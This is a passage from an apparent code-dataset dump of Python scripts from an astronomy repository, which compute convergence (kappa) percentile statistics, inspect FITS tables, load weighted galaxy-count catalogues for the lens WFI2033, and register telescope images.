lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*16-0.3\nax.annotate('8', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', 
va='bottom'\n                 #,bbox=dict(boxstyle='square', fc='white')\n                 ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n                 )\nwidth = 0.35*16\nax.annotate('9', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(1*N)+17.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(1*N)+17.0/(2*N), -0.92), xycoords='axes fraction',\n                 fontsize=fsannotate, ha='center', va='bottom'\n                 #,bbox=dict(boxstyle='square', fc='white')\n                 ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n                 )\nplt.subplots_adjust(left=0.08, bottom=0.3, right=0.99, top=0.95, wspace=0.7, hspace=0)\nplt.savefig('/Users/cerusu/OneDrive - Subaru Telescope/WFI2033kappasims/scaledstdchoiceplot.png', dpi=250)\nplt.clf()\n" }, { "alpha_fraction": 0.6832586526870728, "alphanum_fraction": 0.7293014526367188, "avg_line_length": 78.82781219482422, "blob_id": "d50f548048458d65e82bf2e20bd7ea1d413c5f6e", "content_id": "a5e8951dec041ed964038976f4fa79108a1be305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12054, "license_type": "no_license", "max_line_length": 849, "num_lines": 151, "path": "/python/catalogue_utilities/plotkappacompletestatistics45.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes medians and 16th, 84th percentiles from all the unbiased kappa files\n# Run as python plotkappacompletestatistics.py WFI2033 5 23 45\n\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nlens = str(sys.argv[1])\ninner = str(sys.argv[2])\nmag = str(sys.argv[3])\nrad = str(sys.argv[4])\n\nmin_kappa = -0.10\nmax_kappa = 1\nmin_kappa_plot = -0.1\nmax_kappa_plot = 0.30\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_): # walk the cumulative histogram to find the median and the 16th/84th percentiles; stddev is half the 16th-84th width\n    a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n    sum = np.sum(kappa_all_)\n    #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n    #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n    #std = np.sqrt(meanX2 - meanX**2)\n    \n    med = 0\n    i = 0\n    ok = False\n    while (med <= sum/2.0) and (ok == False):\n        med = med + kappa_all_[i]\n        if med > sum/2.0:\n            median = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum/2.0:\n            median = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n    \n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum * 0.16) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum * 0.16:\n            std1_ = kappa_values[i] + halfwidth\n            ok = True\n        if std == sum*0.16:\n            std1_ = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n    \n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum*0.84) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum*0.84:\n            std1 = kappa_values[i] + halfwidth\n            ok = True\n        if std == sum*0.84:\n            std1 = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n    \n    stddev = (std1 - std1_) / 2\n    \n    return median,stddev,kappa_values\n\nkappa_counts1 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_gal = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_%s_%s_meds_increments2.cat\" % (root,lens,inner,mag,rad), 
unpack=True)\nkappa_counts1_galgamma = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_%s_%s_meds_increments2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_z_%s_%s_meds_increments2_2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_z_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts6 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_increments2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_zoverr_%s_%s_meds_increments2_2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_zoverr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_massoverr_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_massoverr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overr_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2overr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overr_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2rms_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2rms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3rms_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12_ = 
np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3rms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overrrms_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2overrrms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overrrms_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_flexion_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_flexion_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_tidal_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_tidal_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIS_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_SIS_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIShalo_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_SIShalo_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\n\nmedian1,stddev1,kappa_values = statistics(kappa_counts1,bin_stat,min_kappa,max_kappa)\nmedian1_gal,stddev1_gal,kappa_values = statistics(kappa_counts1_gal,bin_stat,min_kappa,max_kappa)\nmedian1_galgamma,stddev1_galgamma,kappa_values = statistics(kappa_counts1_galgamma,bin_stat,min_kappa,max_kappa)\nmedian2,stddev2,kappa_values = statistics(kappa_counts2,bin_stat,min_kappa,max_kappa)\nmedian2_,stddev2_,kappa_values = statistics(kappa_counts2_,bin_stat,min_kappa,max_kappa)\nmedian3,stddev3,kappa_values = statistics(kappa_counts3,bin_stat,min_kappa,max_kappa)\nmedian3_,stddev3_,kappa_values = statistics(kappa_counts3_,bin_stat,min_kappa,max_kappa)\nmedian4,stddev4,kappa_values = statistics(kappa_counts4,bin_stat,min_kappa,max_kappa)\nmedian4_,stddev4_,kappa_values = statistics(kappa_counts4_,bin_stat,min_kappa,max_kappa)\nmedian5,stddev5,kappa_values = statistics(kappa_counts5,bin_stat,min_kappa,max_kappa)\nmedian5_,stddev5_,kappa_values = statistics(kappa_counts5_,bin_stat,min_kappa,max_kappa)\nmedian6,stddev6,kappa_values = statistics(kappa_counts6,bin_stat,min_kappa,max_kappa)\nmedian7,stddev7,kappa_values = statistics(kappa_counts7,bin_stat,min_kappa,max_kappa)\nmedian7_,stddev7_,kappa_values = statistics(kappa_counts7_,bin_stat,min_kappa,max_kappa)\nmedian8,stddev8,kappa_values = statistics(kappa_counts8,bin_stat,min_kappa,max_kappa)\nmedian8_,stddev8_,kappa_values = 
statistics(kappa_counts8_,bin_stat,min_kappa,max_kappa)\nmedian9,stddev9,kappa_values = statistics(kappa_counts9,bin_stat,min_kappa,max_kappa)\nmedian9_,stddev9_,kappa_values = statistics(kappa_counts9_,bin_stat,min_kappa,max_kappa)\nmedian10,stddev10,kappa_values = statistics(kappa_counts10,bin_stat,min_kappa,max_kappa)\nmedian10_,stddev10_,kappa_values = statistics(kappa_counts10_,bin_stat,min_kappa,max_kappa)\nmedian11,stddev11,kappa_values = statistics(kappa_counts11,bin_stat,min_kappa,max_kappa)\nmedian11_,stddev11_,kappa_values = statistics(kappa_counts11_,bin_stat,min_kappa,max_kappa)\nmedian12,stddev12,kappa_values = statistics(kappa_counts12,bin_stat,min_kappa,max_kappa)\nmedian12_,stddev12_,kappa_values = statistics(kappa_counts12_,bin_stat,min_kappa,max_kappa)\nmedian13,stddev13,kappa_values = statistics(kappa_counts13,bin_stat,min_kappa,max_kappa)\nmedian13_,stddev13_,kappa_values = statistics(kappa_counts13_,bin_stat,min_kappa,max_kappa)\nmedian14,stddev14,kappa_values = statistics(kappa_counts14,bin_stat,min_kappa,max_kappa)\nmedian14_,stddev14_,kappa_values = statistics(kappa_counts14_,bin_stat,min_kappa,max_kappa)\nmedian15,stddev15,kappa_values = statistics(kappa_counts15,bin_stat,min_kappa,max_kappa)\nmedian15_,stddev15_,kappa_values = statistics(kappa_counts15_,bin_stat,min_kappa,max_kappa)\nmedian16,stddev16,kappa_values = statistics(kappa_counts16,bin_stat,min_kappa,max_kappa)\nmedian16_,stddev16_,kappa_values = statistics(kappa_counts16_,bin_stat,min_kappa,max_kappa)\nmedian17,stddev17,kappa_values = statistics(kappa_counts17,bin_stat,min_kappa,max_kappa)\nmedian17_,stddev17_,kappa_values = statistics(kappa_counts17_,bin_stat,min_kappa,max_kappa)\nmedian18,stddev18,kappa_values = statistics(kappa_counts18,bin_stat,min_kappa,max_kappa)\nmedian18_,stddev18_,kappa_values = statistics(kappa_counts18_,bin_stat,min_kappa,max_kappa)\n\nhead = \"median_1+1/r+ median_1+1/r+gamma+ std_1+1/r+ std_1+1/r+gamma+ \"\nnp.savetxt('%skappastatistics_%s_%s_%s_%s.lst' % (root,lens,inner,mag,rad),np.c_[np.array([median1_gal,median2_,median3_,median4_,median5_,median6,median7_,median8_,median9_,median10_,median11_,median12_,median13_,median14_,median15_,median16_,median17_,median18_]),np.array([median1_galgamma,median2,median3,median4,median5,median1,median7,median8,median9,median10,median11,median12,median13,median14,median15,median16,median17,median18]),np.array([stddev1_gal,stddev2_,stddev3_,stddev4_,stddev5_,stddev6,stddev7_,stddev8_,stddev9_,stddev10_,stddev11_,stddev12_,stddev13_,stddev14_,stddev15_,stddev16_,stddev17_,stddev18_]),np.array([stddev1_galgamma,stddev2,stddev3,stddev4,stddev5,stddev1,stddev7,stddev8,stddev9,stddev10,stddev11,stddev12,stddev13,stddev14,stddev15,stddev16,stddev17,stddev18])],fmt='%s',delimiter='\\t',newline='\\n',header=head)\n" }, { "alpha_fraction": 0.6405375003814697, "alphanum_fraction": 0.6584546566009521, "avg_line_length": 27.80645179748535, "blob_id": "37ecd21a81e5525071f18458935214d568d82ca9", "content_id": "6cab52647a3500c0eab0d18f00b6ba0f2e8a3349", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 893, "license_type": "no_license", "max_line_length": 111, "num_lines": 31, "path": "/python/catalogue_utilities/inspectFITStable.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 18 2018\n# Inspect the structure and content of a FITS table. 
This mimics the UNIX !head/!tail command for an ASCII file\n# run as python inspectFITStable.py [table.fits] [head/tail] [number of head lines]\n\nimport sys\nimport fitsio # https://github.com/esheldon/fitsio\n\nfile = str(sys.argv[1])\nmode = str(sys.argv[2])\nnumber = int(str(sys.argv[3]))\ntable = fitsio.FITS(file)\ncolumns = table[1].get_colnames()\n\nif mode == 'head':\n read = table[1][0 : number]\nif mode == 'tail':\n read = table[1][int(table[1].get_nrows()) - number : int(table[1].get_nrows())]\n\nprint(table)\nprint \"Number of rows: \", table[1].get_nrows()\n\nstrcolumns = \"\"\nfor i in range(len(columns)):\n strcolumns = strcolumns + columns[i] + \"\\t\"\nprint strcolumns\n\nfor i in range(number):\n strrows = \"\"\n for j in range(len(columns)):\n strrows = strrows + \"%s \\t\" % read[i][j]\n print strrows\n" }, { "alpha_fraction": 0.6073282361030579, "alphanum_fraction": 0.6673791408538818, "avg_line_length": 76.97618865966797, "blob_id": "94fb31a129ae39c776764a2e1cc5d9c1ca6e943d", "content_id": "498e86c744c2b4db975e1cfa2994db9dd94d5edd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9825, "license_type": "no_license", "max_line_length": 581, "num_lines": 126, "path": "/python/catalogue_utilities/test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\ntry: specialtest = '_'+str(sys.argv[13])\nexcept: specialtest = ''\n\nplt.clf()\n\nfontlegend = 8\nfontsize = 8\nfontordonate = 4\nfontabsciss = 8\nfontlabel = 2\npltrange = 3\nsamples = 10\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Working on samples:\"\n\nmedsum50W1 = np.zeros((18,samples))\nmedsum75W1 = np.zeros((18,samples))\nmedsum50W2 = np.zeros((18,samples))\nmedsum75W2 = np.zeros((18,samples))\nmedsum50W3 = np.zeros((18,samples))\nmedsum75W3 = np.zeros((18,samples))\nmedsum50W4 = np.zeros((18,samples))\nmedsum75W4 = np.zeros((18,samples))\n\nfor nr in range(samples):\n print '%s/%s' %(nr,samples-1)\n lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)] # select from the files in the root directory\n lstW1_75 = [x for x in os.listdir(root) if ('W1' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_75 = [x for x in os.listdir(root) if ('W2' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_50 = 
[x for x in os.listdir(root) if ('W3' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_75 = [x for x in os.listdir(root) if ('W3' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_75 = [x for x in os.listdir(root) if ('W4' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n\n print \"W1...\"\n for i in range(len(lstW1_50)):\n hdu = fits.open(root+lstW1_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W1_50read = dataread\n else: q_W1_50read = np.r_['1',q_W1_50read,dataread]\n hdu.close()\n #print np.shape(q_W1_50read)\n for i in range(len(lstW1_75)):\n hdu = fits.open(root+lstW1_75[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W1_75read = dataread\n else: q_W1_75read = np.r_['1',q_W1_75read,dataread]\n hdu.close()\n\n print \"W2...\"\n for i in range(len(lstW2_50)):\n hdu = fits.open(root+lstW2_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W2_50read = dataread\n else: q_W2_50read = np.r_['1',q_W2_50read,dataread]\n hdu.close()\n #print np.shape(q_W2_50read)\n for i in range(len(lstW2_75)):\n hdu = fits.open(root+lstW2_75[i]); data = hdu[1].data\n dataread = 
np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W2_75read = dataread\n else: q_W2_75read = np.r_['1',q_W2_75read,dataread]\n hdu.close()\n\n print \"W3...\"\n for i in range(len(lstW3_50)):\n hdu = fits.open(root+lstW3_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W3_50read = dataread\n else: q_W3_50read = np.r_['1',q_W3_50read,dataread]\n hdu.close()\n #print np.shape(q_W3_50read)\n for i in range(len(lstW3_75)):\n hdu = fits.open(root+lstW3_75[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W3_75read = dataread\n else: q_W3_75read = np.r_['1',q_W3_75read,dataread]\n hdu.close()\n\n print \"W4...\"\n for i in range(len(lstW4_50)):\n hdu = fits.open(root+lstW4_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W4_50read = dataread\n else: q_W4_50read = np.r_['1',q_W4_50read,dataread]\n hdu.close()\n #print np.shape(q_W4_50read)\n for i in range(len(lstW4_75)):\n hdu = fits.open(root+lstW4_75[i]); data = hdu[1].data\n dataread = 
np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n        if i == 0:\n            q_W4_75read = dataread\n        else: q_W4_75read = np.r_['1',q_W4_75read,dataread]\n        hdu.close()\n" }, { "alpha_fraction": 0.7345215678215027, "alphanum_fraction": 0.7786116600036621, "avg_line_length": 49.761905670166016, "blob_id": "35217edfec84a04c18fac21032bb36983baba9b0", "content_id": "e1eb65558cd2141cb19977bc964f4c83c433f259", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1066, "license_type": "no_license", "max_line_length": 163, "num_lines": 21, "path": "/python/learn/quickreduce.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#from pyraf import iraf\n#import pyds9\nimport imexam\n#from os import system\n#system(\"/Applications/ds9.darwinsierra.7.5/ds9 &\")\n# if this does not work, consult https://imexam.readthedocs.io/en/latest/imexam/description.html#how-to-install or perhaps do from outside source activate iraf27\nviewer=imexam.connect()\n# viewer=imexam.connect(\"/tmp/xpa/DS9_ds9.1979\") # this might work if the above does not, where the address is from ds9 > File > XPA > Information... > XPA_METHOD\nviewer.load_fits('/Users/cerusu/Desktop/IRCA00335317.fits')\n# this might work for cross-correlation, especially if I choose image subsection:\nfrom astropy.io import fits\nfrom image_registration import chi2_shift\nfrom image_registration.fft_tools import shift\ndata1 = fits.open('/Users/cerusu/Desktop/IRCA00335317.fits')[0].data\ndata2 = fits.open('/Users/cerusu/Desktop/IRCA00335303.fits')[0].data\nxoff, yoff, exoff, eyoff = chi2_shift(data1, data2, return_error=True, upsample_factor='auto')\n\n#from stellarpop import 